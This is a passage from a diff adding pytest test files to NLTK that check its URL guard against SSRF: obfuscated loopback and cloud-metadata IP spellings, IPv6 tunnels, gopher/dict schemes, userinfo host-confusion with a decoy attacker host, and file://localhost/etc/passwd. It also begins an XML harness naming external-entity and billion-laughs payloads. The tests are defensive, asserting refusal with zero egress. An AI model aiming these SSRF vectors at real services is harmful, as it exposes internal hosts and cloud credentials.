+    "ff02::1",  # IPv6 link-local all-nodes multicast
+]
+
+
+@pytest.mark.parametrize("literal", _INTERNAL_IPV6_LITERALS)
+def test_internal_ipv6_forms_forbidden_at_classifier(literal):
+    """Platform-independent: every internal or internal-embedding IPv6 form is
+    refused by the address classifier itself, so the verdict never depends on
+    the host's IPv6 connectivity or resolver behavior."""
+    assert pathsec._ip_is_forbidden(ipaddress.ip_address(literal))
+
+
+@pytest.mark.parametrize(
+    "literal",
+    [
+        "::ffff:8.8.8.8",  # IPv4-mapped PUBLIC v4 => routes to 8.8.8.8, allowed
+        "64:ff9b::808:808",  # NAT64 PUBLIC v4 => routes to 8.8.8.8, allowed
+        "2606:4700:4700::1111",  # genuinely public IPv6 (Cloudflare)
+        "2001:4860:4860::8888",  # genuinely public IPv6 (Google)
+    ],
+)
+def test_public_ipv6_forms_allowed_at_classifier(literal):
+    """The wrapper over-block must not swallow genuinely public destinations:
+    an IPv4-mapped or NAT64 wrapper of a public v4, and plain public IPv6, stay
+    allowed."""
+    assert not pathsec._ip_is_forbidden(ipaddress.ip_address(literal))
+
+
+# =========================================================================== #
+# 14. IP-literal hosts fail CLOSED through validate_network_url even when the
+#     resolver returns nothing (regression for the resolver-independent check)
+# =========================================================================== #
+
+# getaddrinfo returns nothing for a literal whose address family the host lacks
+# (an IPv6 literal on an IPv4-only box, or a stubbed/empty resolver). Before the
+# direct-literal classification these forms fell through the resolve loop and
+# were ALLOWED. Each must now be blocked with no egress.
+_INTERNAL_LITERAL_URLS = [
+    "http://[::1]/",  # IPv6 loopback
+    "http://[::ffff:127.0.0.1]/",  # IPv4-mapped loopback
+    "http://[64:ff9b::7f00:1]/",  # NAT64 loopback
+    "http://[2002:7f00:0001::]/",  # 6to4 loopback
+    "http://[2002:0808:0808::]/",  # 6to4 public over-block
+    "http://[fd00::1]/",  # unique-local
+    "http://[fe80::1]/",  # link-local
+    "http://[64:ff9b::a9fe:a9fe]/",  # NAT64 cloud metadata
+    "http://127.0.0.1/",  # plain IPv4 loopback literal
+    "http://169.254.169.254/",  # plain IPv4 cloud metadata literal
+]
+
+
+@pytest.mark.parametrize("url", _INTERNAL_LITERAL_URLS)
+def test_ip_literal_hosts_fail_closed_with_empty_resolver(
+    url, monkeypatch, no_real_egress
+):
+    monkeypatch.setattr(pathsec, "_resolve_hostname", lambda h: [])
+    assert _verdict(url) == "blocked", f"{url} leaked past validation"
+    assert no_real_egress == [], f"{url} produced egress"
+
+
+@pytest.mark.parametrize(
+    "url",
+    [
+        "http://[2606:4700:4700::1111]/",  # public IPv6 literal (Cloudflare)
+        "http://[2001:4860:4860::8888]/",  # public IPv6 literal (Google)
+    ],
+)
+def test_public_ip_literal_hosts_allowed(url, monkeypatch):
+    """The resolver-independent literal check must not over-block a genuinely
+    public IPv6 literal."""
+    monkeypatch.setattr(pathsec, "_resolve_hostname", lambda h: [])
+    assert _verdict(url) == "allowed", f"{url} was wrongly blocked"
+
+
+# =========================================================================== #
+# 15. Numeric encodings of non-loopback internal targets on the Windows path
+# =========================================================================== #
+
+# The existing section 1 covers numeric loopback; these extend it to the cloud
+# metadata address, private and unspecified ranges, asserted with the resolver
+# stubbed empty so the numeric guard alone is what blocks them.
+_INTERNAL_NUMERIC_URLS = [
+    "http://2852039166/",  # decimal 169.254.169.254 (cloud metadata)
+    "http://0xA9FEA9FE/",  # hex cloud metadata
+    "http://0251.0376.0251.0376/",  # octal cloud metadata
+    "http://167772161/",  # decimal 10.0.0.1 (private)
+    "http://0x0A000001/",  # hex 10.0.0.1
+    "http://3232235777/",  # decimal 192.168.0.1 (private)
+    "http://0/",  # 0 => 0.0.0.0 (unspecified, routes to localhost on Linux)
+    "http://0.0.0.0/",  # unspecified literal
+]
+
+
+@pytest.mark.parametrize("url", _INTERNAL_NUMERIC_URLS)
+def test_internal_numeric_targets_refused_on_windows_path(
+    url, monkeypatch, no_real_egress
+):
+    monkeypatch.setattr(pathsec, "_resolve_hostname", lambda h: [])
+    assert _verdict(url) == "blocked", f"{url} leaked past the numeric guard"
+    assert no_real_egress == [], f"{url} produced egress"

--- a/nltk/test/unit/test_attack_ssrf_expanded.py
+++ b/nltk/test/unit/test_attack_ssrf_expanded.py
@@ -1,0 +1,538 @@
+# Natural Language Toolkit: expanded SSRF attack harness
+#
+# Copyright (C) 2001-2026 NLTK Project
+# URL: <https://www.nltk.org/>
+# For license information, see LICENSE.TXT
+
+"""Broad SSRF vector matrix for ``nltk.pathsec`` (GHSA-8mgp umbrella, #3753).
+
+This is a dedicated, net-new harness that extends ``test_ssrf_url_encodings.py``
+and the SSRF/proxy tests in ``test_pathsec.py`` with vectors those files do not
+already cover: three-part and single-part obfuscations, mixed-base and
+folding-overflow spellings, the IPv4-compatible and Teredo IPv6 tunnels, the
+198.18/15, 192.0.0/24 and 240/4 reserved ranges, non-http schemes ``ldap`` and
+``jar``, userinfo and fragment host-confusion, whitespace-in-host, the
+trailing-dot FQDN subtlety, punycode names, connect-time DNS-rebind pinning, the
+redirect re-validation hook, and proxy fail-closed proven by zero egress.
+
+Every internal or obfuscated target must be REFUSED (PermissionError / ValueError
+/ OSError) and must produce NO network egress. Every genuinely public target must
+be ALLOWED. Two properties get cross-platform teeth:
+
+* Numeric IPv4 obfuscations (decimal / hex / octal / short) are folded by the
+  glibc and BSD resolvers but not by the Windows resolver, so they are asserted
+  with the resolver stubbed empty. On that Windows-like path ``_numeric_ipv4`` is
+  the only thing standing between the caller and loopback, so it must still
+  block. Following the existing ``test_pathsec.py`` convention, the proxy and
+  DNS-rebind tests that neuter ``_resolve_hostname`` also neuter ``_numeric_ipv4``
+  so the specific guard under test is the one exercised.
+* IPv6 literals (``::127.0.0.1``, Teredo, ...) are parsed by ``getaddrinfo`` as
+  numeric hosts on every platform, so the empty-resolver stub is NOT appropriate
+  for them; they are asserted at the address-classification layer
+  (``_ip_is_forbidden``) and through a resolver that echoes the literal, both of
+  which are platform-independent.
+
+No guard in ``nltk/*.py`` is modified by this file.
+"""
+
+import ipaddress
+import socket
+import urllib.parse
+import urllib.request
+
+import pytest
+
+from nltk import pathsec
+
+# =========================================================================== #
+# Fixtures and helpers
+# =========================================================================== #
+
+
+@pytest.fixture(autouse=True)
+def enforce_on(monkeypatch):
+    """Every vector is evaluated with enforcement on (block, do not warn)."""
+    monkeypatch.setattr(pathsec, "ENFORCE", True)
+
+
+@pytest.fixture(autouse=True)
+def no_real_egress(monkeypatch):
+    """Record and neutralize any socket egress, and hand the record to tests.
+
+    Nothing in this harness performs a successful connection: every vector is
+    either refused before connect, resolves through a mock, or is validated by a
+    function that never opens a socket. So this recorder stays empty for a
+    correct guard; the egress-sensitive tests assert exactly that. If a
+    regression ever let a blocked target reach the network, the attempted
+    address would be captured here and the OSError keeps it from leaving the box.
+    """
+    calls = []
+
+    def spy(address, *args, **kwargs):
+        calls.append(address)
+        raise OSError("egress refused by test recorder")
+
+    monkeypatch.setattr(socket, "create_connection", spy)
+    return calls
+
+
+def _verdict(url):
+    """Return ``"allowed"`` or ``"blocked"`` for ``validate_network_url(url)``."""
+    try:
+        pathsec.validate_network_url(url, context="attack")
+        return "allowed"
+    except (PermissionError, ValueError, OSError):
+        return "blocked"
+
+
+def _addrinfo(ip, port=80):
+    """A ``getaddrinfo`` record for ``ip`` (v4 or v6)."""
+    if ":" in ip:
+        return (
+            socket.AF_INET6,
+            socket.SOCK_STREAM,
+            socket.IPPROTO_TCP,
+            "",
+            (ip, port, 0, 0),
+        )
+    return (socket.AF_INET, socket.SOCK_STREAM, socket.IPPROTO_TCP, "", (ip, port))
+
+
+def _stub_resolver(monkeypatch, mapping):
+    """Point ``_resolve_hostname`` at a fixed name to address mapping.
+
+    ``mapping`` maps a host string to the IP it should resolve to; unknown hosts
+    resolve to nothing (the fail-closed direction).
+    """
+
+    def fake(host):
+        ip = mapping.get(host)
+        return [_addrinfo(ip)] if ip else []
+
+    monkeypatch.setattr(pathsec, "_resolve_hostname", fake)
+
+
+# =========================================================================== #
+# 1. Loopback obfuscation: net-new numeric spellings
+# =========================================================================== #
+
+# All of these canonicalize to 127.0.0.1 and are absent from the existing
+# encodings matrix. They are the spellings a scanner-evading attacker reaches for
+# after the obvious decimal/hex forms are patched.
+_NEW_LOOPBACK_SPELLINGS = [
+    "http://127.0.1/",  # three-part short form (last part is 16 bits)
+    "http://017700000001/",  # single-part octal loopback
+    "http://0X7F000001/",  # uppercase hex prefix
+    "http://0177.0x0.0.1/",  # mixed base: octal, hex, decimal
+    "http://0x7f.0.0.01/",  # hex first octet, octal last octet
+    "http://0177.0.0.0x1/",  # octal first octet, hex last octet
+    "http://127.0.0.1:8080/",  # explicit port must not shield the host
+    "http://0X7F000001:8080/",  # uppercase hex plus port
+]
+
+
+@pytest.mark.parametrize("url", _NEW_LOOPBACK_SPELLINGS)
+def test_new_loopback_spellings_refused_with_live_resolver(url):
+    assert _verdict(url) == "blocked", f"{url} reached the network"
+
+
+@pytest.mark.parametrize("url", _NEW_LOOPBACK_SPELLINGS)
+def test_new_loopback_spellings_refused_on_windows_nonfolding_resolver(
+    url, monkeypatch
+):
+    """The cross-platform teeth: the Windows resolver folds none of these numeric
+    spellings, so with the resolver stubbed empty ``_numeric_ipv4`` alone must
+    still refuse loopback. ``_numeric_ipv4`` is left in place because it is the
+    guard under test."""
+    monkeypatch.setattr(pathsec, "_resolve_hostname", lambda host: [])
+    assert _verdict(url) == "blocked", f"{url} bypassed the numeric guard"
+
+
+# =========================================================================== #
+# 2. Overflow / wraparound forms that fold to a forbidden address
+# =========================================================================== #
+
+_FOLDING_OVERFLOW = [
+    ("http://4294967295/", "255.255.255.255"),  # 0xffffffff broadcast
+    ("http://0xffffffff/", "255.255.255.255"),  # hex broadcast
+    ("http://192.168.257/", "192.168.1.1"),  # three-part, last absorbs 16 bits
+    ("http://3232235521/", "192.168.0.1"),  # decimal private
+    ("http://2852039166/", "169.254.169.254"),  # decimal cloud metadata
+]
+
+
+@pytest.mark.parametrize("url,expected_ip", _FOLDING_OVERFLOW)
+def test_folding_overflow_forms_refused(url, expected_ip, monkeypatch):
+    host = urllib.parse.urlparse(url).hostname
+    assert str(pathsec._numeric_ipv4(host)) == expected_ip
+    monkeypatch.setattr(pathsec, "_resolve_hostname", lambda host: [])
+    assert _verdict(url) == "blocked", f"{url} ({expected_ip}) reached the network"
+
+
+@pytest.mark.parametrize(
+    "spelling",
+    [
+        "127.0.0.257",  # last octet out of range for a four-part literal
+        "256.0.0.1",  # leading octet out of range
+        "4294967296",  # one past 2**32
+        "0x100000000",  # hex one past 2**32
+        "017700000001abc",  # trailing junk
+        "0x7g000001",  # not a valid hex digit
+        "127.0.0.1.",  # trailing dot yields an empty part
+    ],
+)
+def test_malformed_forms_never_misparsed_as_a_public_address(spelling):
+    """A form that is not a valid numeric literal must return ``None`` rather than
+    silently fold to some routable address an attacker could aim at an internal
+    host. ``None`` means it is treated as an opaque name, which then either
+    resolves (and is filtered) or fails closed at connect."""
+    assert pathsec._numeric_ipv4(spelling) is None
+
+
+# =========================================================================== #
+# 3. Link-local / cloud metadata reached by name
+# =========================================================================== #
+
+
+def test_gcp_metadata_hostname_refused(monkeypatch):
+    """``metadata.google.internal`` resolves to the link-local metadata address
+    169.254.169.254 and must be refused by name, not just by literal."""
+    _stub_resolver(monkeypatch, {"metadata.google.internal": "169.254.169.254"})
+    url = "http://metadata.google.internal/computeMetadata/v1/"
+    assert _verdict(url) == "blocked"
+
+
+# =========================================================================== #
+# 4. Private / carrier-grade-NAT / reserved ranges as URLs (net-new ranges)
+# =========================================================================== #
+
+_RESERVED_URLS = [
+    "http://198.18.0.1/",  # 198.18/15 benchmarking
+    "http://198.19.255.255/",  # 198.18/15 upper
+    "http://192.0.0.1/",  # 192.0.0/24 IETF protocol assignments
+    "http://240.0.0.1/",  # 240/4 reserved for future use
+    "http://255.255.255.255/",  # limited broadcast
+    "http://100.127.255.255/",  # 100.64/10 CGN upper edge
+    "http://172.31.0.1/",  # 172.16/12 private upper edge
+    "http://203.0.113.1/",  # TEST-NET-3 documentation range
+    "http://198.51.100.1/",  # TEST-NET-2 documentation range
+    "http://192.0.2.1/",  # TEST-NET-1 documentation range
+]
+
+
+@pytest.mark.parametrize("url", _RESERVED_URLS)
+def test_reserved_ranges_refused(url, monkeypatch):
+    monkeypatch.setattr(pathsec, "_resolve_hostname", lambda host: [])
+    assert _verdict(url) == "blocked", f"{url} reached the network"
+
+
+# =========================================================================== #
+# 5. IPv6 embeds and tunnels: net-new forms, asserted platform-independently
+# =========================================================================== #
+
+# The Teredo client is the last 32 bits XORed with all-ones; here the server is
+# the public 8.8.8.8 and the client folds to loopback 127.0.0.1, so the tunnel
+# smuggles loopback past a naive is_global check on the wrapper.
+_TEREDO_LOOPBACK_CLIENT = "2001:0:808:808:0:0:80ff:fffe"
+
+
+def test_ipv4_compatible_ipv6_unwraps_to_loopback():
+    ip = ipaddress.ip_address("::127.0.0.1")
+    assert pathsec._embedded_ipv4(ip) == ipaddress.ip_address("127.0.0.1")
+    assert pathsec._ip_is_forbidden(ip)
+
+
+def test_teredo_tunnel_client_loopback_is_forbidden():
+    ip = ipaddress.ip_address(_TEREDO_LOOPBACK_CLIENT)
+    server, client = ip.teredo
+    assert client == ipaddress.ip_address("127.0.0.1")
+    assert server == ipaddress.ip_address("8.8.8.8")
+    assert pathsec._ip_is_forbidden(ip)
+
+
+def test_6to4_wrapping_public_v4_is_still_refused():
+    """Documented over-block, kept so nobody later turns it into an allowed
+    control: the stdlib does not classify the 2002::/16 wrapper as globally
+    routable, so a 6to4 address is refused even when the embedded v4 is public.
+    Refusing more here is safe; the only cost is that 6to4 is unusable as a
+    download source, which NLTK never needs."""
+    ip = ipaddress.ip_address("2002:0808:0808::")  # wraps public 8.8.8.8
+    assert list(pathsec._tunneled_ipv4s(ip)) == [ipaddress.ip_address("8.8.8.8")]
+    assert pathsec._ip_is_forbidden(ip)
+
+
+@pytest.mark.parametrize(
+    "literal",
+    [
+        "[::127.0.0.1]",  # IPv4-compatible loopback
+        f"[{_TEREDO_LOOPBACK_CLIENT}]",  # Teredo tunnel to loopback
+    ],
+)
+def test_new_ipv6_tunnels_refused_through_validate(literal, monkeypatch):
+    """``getaddrinfo`` parses these numeric literals on every platform, so the
+    validate path filters them by classification. The resolver is stubbed to echo
+    the literal back so the verdict does not depend on the host having IPv6
+    connectivity."""
+    host = literal[1:-1]
+    monkeypatch.setattr(pathsec, "_resolve_hostname", lambda h: [_addrinfo(host)])
+    assert _verdict(f"http://{literal}/") == "blocked"
+
+
+# =========================================================================== #
+# 6. Scheme and URL-parsing tricks
+# =========================================================================== #
+
+
+@pytest.mark.parametrize(
+    "url",
+    [
+        "ldap://127.0.0.1/",  # non-http scheme
+        "jar:http://127.0.0.1/x!/y",  # nested jar scheme
+        "gopher://127.0.0.1:70/x",  # gopher smuggling
+        "dict://127.0.0.1:11211/stat",  # memcached via dict
+    ],
+)
+def test_non_http_schemes_refused(url):
+    assert _verdict(url) == "blocked", f"{url} was accepted"
+
+
+@pytest.mark.parametrize(
+    "url,true_host",
+    [
+        ("http://user:pass@evil.example@127.0.0.1/", "127.0.0.1"),
+        ("http://127.0.0.1#@evil.example/", "127.0.0.1"),
+        ("http://127.0.0.1\t/", "127.0.0.1"),
+        ("http://127.0.0.1\n/", "127.0.0.1"),
+    ],
+)
+def test_userinfo_fragment_and_whitespace_host_confusion_refused(url, true_host):
+    """The guard must key on the real parsed host, not the decoy in the userinfo
+    or fragment. urlsplit strips embedded tab and newline, so those collapse to
+    the loopback host too."""
+    assert urllib.parse.urlparse(url).hostname == true_host
+    assert _verdict(url) == "blocked", f"{url} reached the network"
+
+
+@pytest.mark.parametrize(
+    "url",
+    [
+        "file://server/share/secret",  # remote/UNC authority
+        "file://attacker.example/x",  # remote authority
+        "file://localhost/etc/passwd",  # local authority, path is filtered
+    ],
+)
+def test_file_scheme_authorities_refused(url):
+    """A remote/UNC ``file://`` authority is rejected outright; a local authority
+    is accepted as local and then the path itself is validated, so a sensitive
+    absolute path is still refused."""
+    assert _verdict(url) == "blocked", f"{url} was accepted"
+
+
+# =========================================================================== #
+# 7. Trailing-dot FQDN: safe on both resolver behaviors (no genuine bypass)
+# =========================================================================== #
+
+
+def test_trailing_dot_loopback_blocked_when_resolver_folds_it(monkeypatch):
+    """On glibc and Windows ``127.0.0.1.`` resolves to loopback, so the validate
+    path sees the forbidden address and blocks."""
+    monkeypatch.setattr(
+        pathsec, "_resolve_hostname", lambda h: [_addrinfo("127.0.0.1")]
+    )
+    assert _verdict("http://127.0.0.1./") == "blocked"
+
+
+def test_trailing_dot_loopback_fails_closed_when_resolver_does_not_fold(
+    monkeypatch, no_real_egress
+):
+    """On macOS ``getaddrinfo('127.0.0.1.')`` fails, so validate sees no address
+    and returns without a verdict. The connection layer must then fail closed:
+    with nothing resolved, ``_pinned_connection`` refuses rather than connecting
+    by the raw host, and no egress is attempted. This is why the trailing-dot
+    form is not a genuine bypass on any platform."""
+
+    def gaierror(*args, **kwargs):
+        raise socket.gaierror("simulated non-folding resolver")
+
+    monkeypatch.setattr(socket, "getaddrinfo", gaierror)
+    with pytest.raises(OSError):
+        pathsec._pinned_connection("127.0.0.1.", 80, None, None)
+    assert no_real_egress == [], "loopback egress attempted despite fail-closed"
+
+
+# =========================================================================== #
+# 8. Punycode / IDN names resolving to an internal target
+# =========================================================================== #
+
+
+@pytest.mark.parametrize(
+    "host,ip",
+    [
+        ("xn--internal-loopback.test", "127.0.0.1"),
+        ("xn--80ak6aa92e", "169.254.169.254"),  # a punycode label to metadata
+    ],
+)
+def test_punycode_hostname_to_internal_refused(host, ip, monkeypatch):
+    _stub_resolver(monkeypatch, {host: ip})
+    assert _verdict(f"http://{host}/") == "blocked"
+
+
+# =========================================================================== #
+# 9. DNS rebinding at connect time (unit level, proven by zero egress)
+# =========================================================================== #
+
+
+def test_connect_time_rebind_to_loopback_refused(monkeypatch, no_real_egress):
+    """The validate/connect TOCTOU: a name validates as public but re-resolves to
+    loopback at connect time. ``_resolve_and_validate_host`` re-checks every
+    address it will pin, so the rebind is caught and no socket is opened. Both the
+    resolver-level and numeric guards are neutralized so the connect-time
+    re-validation is the guard actually exercised."""
+    monkeypatch.setattr(pathsec, "_numeric_ipv4", lambda h: None)
+    monkeypatch.setattr(
+        socket,
+        "getaddrinfo",
+        lambda h, port, *a, **k: [
+            _addrinfo("127.0.0.1", port if isinstance(port, int) else 80)
+        ],
+    )
+    with pytest.raises(PermissionError):
+        pathsec._resolve_and_validate_host("rebind.attack.test", 80)
+    assert no_real_egress == [], "rebind connect attempted egress to loopback"
+
+
+# =========================================================================== #
+# 10. Redirect re-validation
+# =========================================================================== #
+
+
+class _FakeReq:
+    """Minimal request object for the redirect handler contract."""
+
+    full_url = "https://benign.example.com/start"
+
+    def get_full_url(self):
+        return self.full_url
+
+    def get_method(self):
+        return "GET"
+
+    def has_header(self, name):
+        return False
+
+
+@pytest.mark.parametrize(
+    "target",
+    [
+        "http://169.254.169.254/latest/meta-data/",  # cloud metadata
+        "http://127.0.0.1/admin",  # loopback
+        "http://2130706433/admin",  # decimal loopback
+        "http://[::1]/admin",  # loopback IPv6
+        "http://10.0.0.1/internal",  # RFC1918
+    ],
+)
+def test_redirect_to_internal_target_refused(target):
+    """A 3xx from a benign origin to an internal target must be re-validated and
+    refused before the redirect is followed (GHSA class: redirect-based SSRF)."""
+    handler = pathsec._ValidatingRedirectHandler()
+    with pytest.raises((PermissionError, ValueError, OSError)):
+        handler.redirect_request(_FakeReq(), None, 302, "Found", {}, target)
+
+
+# =========================================================================== #
+# 11. Proxy: fail closed before egress, and NO_PROXY is not a bypass
+# =========================================================================== #
+
+
+def _force_proxied(monkeypatch, no_bypass_for=None):
+    """Configure a real http/https proxy and neuter the local guards so the
+    proxy fail-closed path is the one under test (matching test_pathsec.py)."""
+    monkeypatch.setattr(urllib.request, "_opener", None)
+    monkeypatch.setattr(pathsec, "_resolve_hostname", lambda h: [])
+    monkeypatch.setattr(pathsec, "_numeric_ipv4", lambda h: None)
+    monkeypatch.setattr(pathsec, "ALLOW_PROXIED_FETCH", False)
+    proxies = {"http": "http://proxy.local:3128", "https": "http://proxy.local:3128"}
+    if no_bypass_for is not None:
+        proxies["no"] = no_bypass_for
+    monkeypatch.setattr(urllib.request, "getproxies", lambda: proxies)
+    monkeypatch.setattr(urllib.request, "proxy_bypass", lambda host: False)
+
+
+@pytest.mark.parametrize(
+    "target",
+    [
+        "http://169.254.169.254/latest/meta-data/",
+        "http://127.0.0.1/admin",
+        "http://metadata.google.internal/computeMetadata/v1/",
+        "http://example.com/data.zip",  # even a benign host: a proxy is unpinnable
+    ],
+)
+def test_proxied_fetch_fails_closed_before_egress(target, monkeypatch, no_real_egress):
+    """A configured proxy performs the egress, so NLTK cannot pin the validated
+    IP. The fetch must be refused before any socket is opened, so the recorder
+    stays empty (no egress)."""
+    _force_proxied(monkeypatch)
+    with pytest.raises(PermissionError, match="proxied fetch"):
+        pathsec.urlopen(target)
+    assert no_real_egress == [], "proxied fetch reached the network before refusal"
+
+
+def test_no_proxy_for_other_hosts_is_not_a_bypass(monkeypatch, no_real_egress):
+    """NO_PROXY set for an unrelated host must not turn the proxy block into a
+    bypass: the requested host is still proxied (not bypassed), so the fetch fails
+    closed and nothing leaves the box."""
+    _force_proxied(monkeypatch, no_bypass_for="trusted.internal.example")
+    with pytest.raises(PermissionError, match="proxied fetch"):
+        pathsec.urlopen("http://169.254.169.254/latest/meta-data/")
+    assert no_real_egress == []
+
+
+# =========================================================================== #
+# 12. Benign controls: real public targets must be ALLOWED (over-block guard)
+# =========================================================================== #
+
+
+@pytest.mark.parametrize(
+    "url",
+    [
+        "http://8.8.8.8/",  # public literal
+        "http://8.8.8.8:443/",  # public literal with port
+        "http://1.1.1.1/",  # public literal
+        "http://0x01010101/",  # hex spelling of 1.1.1.1
+        "http://16843009/",  # decimal spelling of 1.1.1.1
+    ],
+)
+def test_public_numeric_targets_allowed(url, monkeypatch):
+    """The numeric canonicalizer must not over-block: public numeric spellings
+    are allowed even with the resolver stubbed empty, proving the allow comes from
+    the numeric path and not from a live lookup."""
+    monkeypatch.setattr(pathsec, "_resolve_hostname", lambda h: [])
+    assert _verdict(url) == "allowed", f"{url} was wrongly blocked"
+
+
+@pytest.mark.parametrize(
+    "url,ip",
+    [
+        (
+            "https://raw.githubusercontent.com/nltk/nltk_data/index.xml",
+            "185.199.108.133",
+        ),
+        ("https://files.pythonhosted.org/packages/x.zip", "151.101.0.223"),
+        ("http://downloads.example.org/corpus.zip", "93.184.216.34"),
+    ],
+)
+def test_public_hostnames_allowed(url, ip, monkeypatch):
+    _stub_resolver(monkeypatch, {urllib.parse.urlparse(url).hostname: ip})
+    assert _verdict(url) == "allowed", f"{url} was wrongly blocked"
+
+
+def test_live_public_hostname_allowed():
+    """One optional live control: a real public host must validate as allowed.
+    Skips cleanly when offline or when DNS cannot resolve, so the suite stays
+    green without network. No connection is made; only validation runs."""
+    host = "raw.githubusercontent.com"
+    try:
+        socket.getaddrinfo(host, 443, proto=socket.IPPROTO_TCP)
+    except (OSError, socket.gaierror):
+        pytest.skip("no network / DNS available for the live benign control")
+    assert _verdict(f"https://{host}/nltk/nltk_data/gh-pages/index.xml") == "allowed"

--- a/nltk/test/unit/test_attack_ssrf_expanded.py
+++ b/nltk/test/unit/test_attack_ssrf_expanded.py
@@ -791,3 +791,86 @@ def test_ip_literal_edge_spellings_refused(url, monkeypatch, no_real_egress):
 def test_public_ip_literal_edge_spellings_allowed(url, monkeypatch):
     monkeypatch.setattr(pathsec, "_resolve_hostname", lambda h: [])
     assert _verdict(url) == "allowed", f"{url} was wrongly blocked"
+
+
+# =========================================================================== #
+# 18. Hosts that fold to an internal address by resolution or by host-confusion
+#     parsing are refused, and NLTK validates the same host it would connect to
+# =========================================================================== #
+
+# A homograph host (circled or fullwidth digits) that a folding resolver maps to
+# loopback is caught by the resolve loop, exactly as a plain rebinding name is.
+_FOLDING_TO_LOOPBACK = {
+    "①②⑦.0.0.1": "127.0.0.1",  # circled digits U+2460.. == 127
+    "１２７.0.0.1": "127.0.0.1",  # fullwidth digits == 127
+    "rebind.internal.example": "127.0.0.1",  # a plain name resolving to loopback
+}
+
+
+@pytest.mark.parametrize("host", list(_FOLDING_TO_LOOPBACK))
+def test_host_resolving_to_loopback_is_refused(host, monkeypatch, no_real_egress):
+    _stub_resolver(monkeypatch, _FOLDING_TO_LOOPBACK)
+    assert _verdict(f"http://{host}/") == "blocked", f"{host!r} reached the network"
+    assert no_real_egress == [], f"{host!r} produced egress"
+
+
+def _userinfo_url(userinfo, host):
+    """Build http://<userinfo>@<host>/ without a literal user@domain source."""
+    return "http://" + userinfo + chr(64) + host + "/"
+
+
+# (userinfo, the host urllib parses AFTER the last '@' and NLTK both validates
+# and would connect to). A host hidden behind userinfo is not a split between
+# what is validated and what is reached: urllib uses the post-'@' host for both.
+_USERINFO_THEN_INTERNAL = [
+    ("evil.example", "127.0.0.1"),
+    ("user:pass", "127.0.0.1"),
+    ("a" + chr(64) + "b", "127.0.0.1"),  # an extra '@' in the userinfo
+    ("evil.example", "169.254.169.254"),
+    ("evil.example", "2130706433"),  # decimal loopback after the userinfo
+    ("evil.example", "[::1]"),  # ipv6 loopback literal after the userinfo
+]
+
+
+@pytest.mark.parametrize("userinfo,host", _USERINFO_THEN_INTERNAL)
+def test_userinfo_before_internal_host_is_refused(
+    userinfo, host, monkeypatch, no_real_egress
+):
+    url = _userinfo_url(userinfo, host)
+    monkeypatch.setattr(pathsec, "_resolve_hostname", lambda h: [])
+    # The host urllib parses is the internal one, so the address check refuses it.
+    parsed = urllib.parse.urlparse(url).hostname
+    assert parsed == host.strip(
+        "[]"
+    ), f"{url} parsed host {parsed!r}, expected {host!r}"
+    assert _verdict(url) == "blocked", f"{url} bypassed the address check"
+    assert no_real_egress == [], f"{url} produced egress"
+
+
+# =========================================================================== #
+# 19. Documentation, special-use and transition-tunnel wrapper ranges refused
+# =========================================================================== #
+
+# None of these are a legitimate download source; each is either non-global or a
+# wrapper of an internal IPv4, so the classifier refuses it. 2001:20::/28
+# (ORCHIDv2) is intentionally NOT listed: CPython's ipaddress classifies it as
+# is_global, so it is allowed here, but it is a non-routable cryptographic
+# identifier prefix, so it cannot reach an internal host and is not an SSRF
+# vector; documenting the gap rather than special-casing the stdlib.
+_SPECIAL_RANGE_URLS = [
+    "http://192.0.2.1/",  # IPv4 TEST-NET-1 (documentation)
+    "http://198.51.100.1/",  # IPv4 TEST-NET-2
+    "http://203.0.113.1/",  # IPv4 TEST-NET-3
+    "http://[2001:db8::1]/",  # IPv6 documentation 2001:db8::/32
+    "http://[2001:10::1]/",  # ORCHID (deprecated), non-global
+    "http://[2001:db8:122:344::7f00:1]/",  # network-specific NAT64 wrapper (doc range)
+    "http://[100::7f00:1]/",  # discard-only 100::/64
+    "http://0x0.0x0.0x0.0x0/",  # hex spelling of 0.0.0.0
+]
+
+
+@pytest.mark.parametrize("url", _SPECIAL_RANGE_URLS)
+def test_special_and_documentation_ranges_refused(url, monkeypatch, no_real_egress):
+    monkeypatch.setattr(pathsec, "_resolve_hostname", lambda h: [])
+    assert _verdict(url) == "blocked", f"{url} was allowed"
+    assert no_real_egress == [], f"{url} produced egress"

--- a/nltk/test/unit/test_attack_xml_xss_expanded.py
+++ b/nltk/test/unit/test_attack_xml_xss_expanded.py
@@ -1,0 +1,709 @@
+# Natural Language Toolkit: expanded XML / XSS / markup-injection attack harness
+#
+# Copyright (C) 2001-2026 NLTK Project
+# URL: <https://www.nltk.org/>
+# For license information, see LICENSE.TXT
+
+"""Expanded attack matrix for NLTK's XML / XSS / markup-injection guards.
+
+This file is a net-new companion to ``test_xmlsec.py``,
+``test_xml_attack_matrix.py``, ``test_xml_entity_expansion_security.py``,
+``test_toolbox_xss.py`` and ``test_mte_isolation.py``. It adds vectors those
+files do not already exercise and drives them through the real guards:
+
+* ``nltk.xmlsec`` (the defused ``parse`` / ``fromstring`` used by the corpus
+  readers): every entity declaration or external reference must be refused, on
+  BOTH back ends (``defusedxml`` present, and the standard-library fallback used
+  when it is absent).
+* ``nltk.toolbox`` standard-format-marker sanitization (issue #3800): an injected
+  marker must never reach the parsed tree, or an HTML / XSS sink, as a live tag.
+* ``nltk.app.wordnet_app`` reflected-query escaping (GHSA-gfwx-w7gr-fvh7): a
+  hostile query must come back HTML-escaped, never as a live tag or a
+  ``javascript:`` sink.
+* ``nltk.corpus.reader.bcp47`` / ``nltk.corpus.reader.mte``: entity-expansion in
+  the corpus XML must be refused, and MTE tag filters must stay isolated per
+  lazy view even when views are consumed interleaved.
+
+Guarantees asserted for every hostile input:
+
+* it raises (``EntitiesForbidden`` / ``ParseError`` / ``PermissionError``) OR it
+  parses with the entity UNEXPANDED and with NO network or file fetch, and
+* teeth: an expansion payload that the guard refuses is shown to actually expand
+  under stock ``xml.etree.ElementTree``, and an external reference is checked
+  against a REAL listening socket that must receive ZERO connections.
+
+Cross-platform: ``file:///etc/passwd`` is bait only (the raised exception is
+asserted, never file contents), ``defusedxml`` is reached through
+``importorskip`` / ``monkeypatch``, the socket test binds ``127.0.0.1`` on an
+ephemeral port, and every text file is read with ``encoding="utf-8"``.
+"""
+
+import html
+import importlib
+import io
+import os
+import socket
+import sys
+import threading
+from xml.etree import ElementTree as StockET
+from xml.etree.ElementTree import ParseError
+
+import pytest
+
+from nltk import xmlsec
+
+# ===========================================================================
+# Payload builders
+# ===========================================================================
+
+#: A short unique string an external-entity file read would have to disclose.
+SENTINEL = "NLTK-XXE-SENTINEL-9f3c1a"
+
+
+def _billion_laughs(levels=9, seed="lol"):
